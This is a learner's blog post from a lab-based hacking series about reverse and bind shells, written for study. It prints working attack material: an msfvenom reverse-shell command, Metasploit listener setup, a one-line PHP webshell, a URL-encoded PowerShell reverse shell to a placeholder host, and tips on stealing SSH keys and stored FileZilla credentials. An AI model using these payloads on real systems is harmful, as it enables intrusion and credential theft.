An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.
Time for a new series during the #FromZeroToHacker challenge.
Table of contents |
Introduction |
What I have learnt today? |
Stats |
Resources |
Introduction to What the Shell?
A Shell is what we use to interface with the operating system’s services. While there are shells with a GUI (Graphical User Interface), normally we use Command Line Interfaces or CLI.
When targeting remote systems, sometimes we can force a remote server to send us command line access to the server (a reverse shell) or to open up a port on the server to which we can connect (a bind shell).
What I have learnt today?
msfvenom
Msfvenom is the one-stop-shop for all things payload related.
Part of the Metasploit framework, msfvenom generates code for reverse and bind shells. While Msfvenom can have loads of uses, we are going to focus on its lower-level exploit development, as it generates hexadecimal shellcode, in various formats (.exe, .aspx, .py, .war…).
This is its syntax:
msfvenom -p PAYLOAD OPTIONS
For example, to generate a Windows x64 Reverse shell in an .exe format:
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=:LOCAL_IP: LPORT=:LISTEN_PORT:
Staged vs Stageless
There are two types of reverse shell payloads:
- Staged payloads are sent in two parts. The first one is the stager, executed directly on the server itself. It connects to our listener, using the connection to load the real payload. We have two parts: The initial stager, and the bulkier reverse shell code. This requires a special listener using Metasploit multi/handler (More about this, later.
- Stageless payloads are more common, and the ones we have been using until now. They are self-contained one piece of code that sends a shell back to the listener when executed.
Stageless payloads are easier to use, but also bulkier and easier for an antivirus to discover and block. Staged payloads are sneakier, as the initial stager is smaller, and easier to elude for intrusion detection programs, but also harder to use.
But modern-day antivirus uses Anti-Malware Scan Interface (AMSI) to detect the payload loaded into memory by the stager, making it nowadays less effective than it used to be.
Meterpreter
Meterpreter shells are Metasploit’s own way of fully featured shell. Completely stable and working with Windows targets too, they have a lot of inbuilt functionality on their own (file uploads, file downloads, etc.)
Payload naming conventions
The basic convention is:
OS/ARCH/PAYLOAD
For example, to generate a stageless reverse shell for an x86 Linux target:
linux/x86/shell_reverse_tcp
In Windows 32bit targets, the arch is not needed:
windows/shell_reverse_tcp
Stageless payloads are denoted with underscores, like the ones we have just seen. The staged equivalent would be:
windows/shell/reverse_tcp
The logic behind this? I don’t know, it just is what it is,
As you saw there are loads of payloads and luckily, for people like me with a short memory, we have msfvenom --list payloads
.
Metasploit multi/handler
Multi/Handler is a superb tool for catching reverse shells, and is essential if we want to use Meterpreter shells.
This is easier to use:
- First, open Metasploit with msfconsole
- Then, type
use multi/handler
and press Enter.
Now, we are primed to start a multi/handler (staged) session. Let’s take a look at the available options using the options
command:
As we can see, there are three options we need to set up: Payload specific to our target, as well as a listening address and port with LHOST and LPORT. To set them up, we need to use the following commands:
- set PAYLOAD :PAYLOAD:
- set LHOST :LOCAL_IP:
- set LPORT :LOCAL_PORT:
Now, we should start the listener by using the exploit -j
command that tells Metasploit to launch the module as a job in the background:
Note: As we are using a port under 1024, we need to run msfconsole
with sudo permissions.
Now, if the staged payload generated in the previous task is run, Metasploit receives a connection, sending the remainder of the payload, giving us a reverse shell finally:
![[day_038_connection_created.png]]
As we backgrounded multi/handler, we need to use sessions 1
to foreground it again.
Webshells
Sometimes, we find websites that allow us to upload an executable file. This is a golden opportunity to upload malicious code that can activate a reverse or bind shell. And sometimes, the developers are aware of our nefarious arts, making it impossible to create a shell.
Well, maybe not impossible, thanks to Webshells.
Webshell is a script that runs inside a web server (using Python, PHP, ASP…) which executes code on the server. The commands are entered into a webpage (via HTML form or arguments in a URL) which are executed by the script, returning the results to the page. This is pretty useful if there are firewalls or as a preparation for a full reverse or bind shell.
Let’s see an example with PHP, a popular programming language:
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
This command will give you a GET parameter in the URL and execute it on the system thanks to shell_exec()
. Any command we enter after ?cmd=
will be executed on the system (Windows or Linux):
![[day_038_webshell.png]]
In this example, we use the cmd
GET parameter with the command ifconfig, which returns the network information of the box, as if it were the terminal.
We can find more web shells available on Kali in the usr/share/webshells
folder.
When the target is Windows, it is easier sometimes to obtain RCE using a web shell by copying into the URL the following as cmd
argument:
powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
Yes, this horrendous command is what we found on What the Shell? Part 1.
Next steps
Ok, we finally have a shell! Now…what?
On Linux, we would be looking for opportunities to gain access to a user account. SSH keys are stored at /home/:USER:/.ssh
and are often an ideal way to do this. Some exploits even will allow you to add your own account.
On Windows, the options are more limited. We can find passwords for running the services in the registry. VNC servers frequently leave passwords in the registry stored in plaintext (!). Some versions of the FileZilla FTP server also leave credentials in an XML file at C:\Program Files\FileZilla Server\FileZilla Server.xml
or C:\xampp\FileZilla Server\FileZilla Server.xml
. These can be MD5 hashes or in plaintext.
Ideally, on Windows, we would obtain a shell running as the SYSTEM user or an admin account. It is possible then, to create your own admin account, then log in over RDP, Telnet, Winexe, etc.
In summary, reverse and bind shells are a great way to gain remote code execution, but they will never be as fully featured as a native shell. Ideally, we will escalate into using a normal method for accessing the machine, as it is easier to use for further exploitation of the target.
Summary
In the second part of What the Shell?, we saw:
- What msfvenom is and how to use it.
- How to create staged reverse shells with Metasploit Multi/handler.
- Webshells.
- What to do after gaining access to a machine.
Stats
From 114.368th to 113.663th. Sitting right now in the Top 6%.
Here is also the Skill Matrix:
Resources
Random Room
Other resources
Reverse Shell Cheat Sheet
SecLists
Precompiled Socat binary
PayloadAllTheThings